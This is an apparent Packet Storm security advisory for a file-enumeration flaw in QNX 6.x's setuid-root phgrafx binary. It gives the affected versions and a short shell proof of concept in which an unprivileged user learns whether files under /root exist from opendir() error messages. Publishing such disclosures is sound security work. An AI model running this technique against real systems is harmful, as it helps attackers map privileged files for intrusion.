QNX version 6.x suffers from a file enumeration vulnerability that leverages the setuid /usr/photon/bin/phgrafx binary.
f9892def99ee2cd533b3bb50760be4d343f5ec3f2e072b5939393723e93753b2# QNX 6.x phgrafx file enumeration vulnerability by cenobyte 2013
# <vincitamorpatriae@gmail.com>
#
# - vulnerability description:
# QNX setuid root /usr/photon/bin/phgrafx allows any non-root user to enumerate
# files and directories due to opendir() messages.
#
# - vulnerable platforms:
# QNX 6.5.0SP1
# QNX 6.5.0
# QNX 6.4.1
# QNX 6.3.0
# QNX 6.2.0
#
# - note:
# Leveraging this on QNX versions <= 6.3.0 will result in a core dump.
$ id
uid=100(user) gid=100
# directory /root/.ph exists:
$ /usr/photon/bin/phgrafx -d /root/.ph
load_display_conf(): No such file or directory
# file /root/.profile exsts:
$ /usr/photon/bin/phgrafx -d /root/.profile
/root/.profile: opendir(): Not a directory
load_display_conf(): Not a directory
# /root/doesnotexist does not exist:
$ /usr/photon/bin/phgrafx -d /root/doesnotexist
/root/doesnotexist: opendir(): No such file or directory
load_display_conf(): No such file or directory
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed